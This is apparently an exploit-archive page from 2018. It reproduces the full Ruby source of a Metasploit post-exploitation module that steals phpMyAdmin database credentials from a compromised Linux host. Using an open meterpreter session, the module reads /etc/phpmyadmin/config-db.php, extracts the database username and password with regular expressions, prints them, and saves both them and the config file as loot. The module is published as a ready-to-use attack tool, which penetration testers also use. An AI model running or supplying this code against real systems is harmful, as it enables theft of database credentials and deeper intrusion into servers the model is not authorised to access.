phpMyAdmin Credential Stealer

2018.09.11
Credit: Mishra Dhiraj
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System def initialize(info={}) super(update_info(info, 'Name' => "Phpmyadmin credentials stealer", 'Description' => %q{ This module gathers Phpmyadmin creds from target linux machine. }, 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'SessionTypes' => ['meterpreter'], 'Author' => [ 'Chaitanya Haritash [bofheaded]', 'Dhiraj Mishra <dhiraj@notsosecure.com>' ] )) end def parse_creds(contents) db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first unless db_user && db_pass print_error("Couldn't find PhpMyAdmin credentials") return end print_good("User: #{db_user}") print_good("Password: #{db_pass}") print_status("Storing credentials...") store_valid_credential(user: db_user, private: db_pass) end def run print_line("\nPhpMyAdmin Creds Stealer!\n") if session.platform.include?("windows") print_error("This module is not compatible with windows") return end conf_path = "/etc/phpmyadmin/config-db.php" unless file_exist?(conf_path) print_error("#{conf_path} doesn't exist on target") return end print_good('PhpMyAdmin config found!') res = read_file(conf_path) unless res print_error("You may not have permissions to read the file.") return end print_good("Extracting creds") parse_creds(res) p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf') print_good("Config file located at #{p}") end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top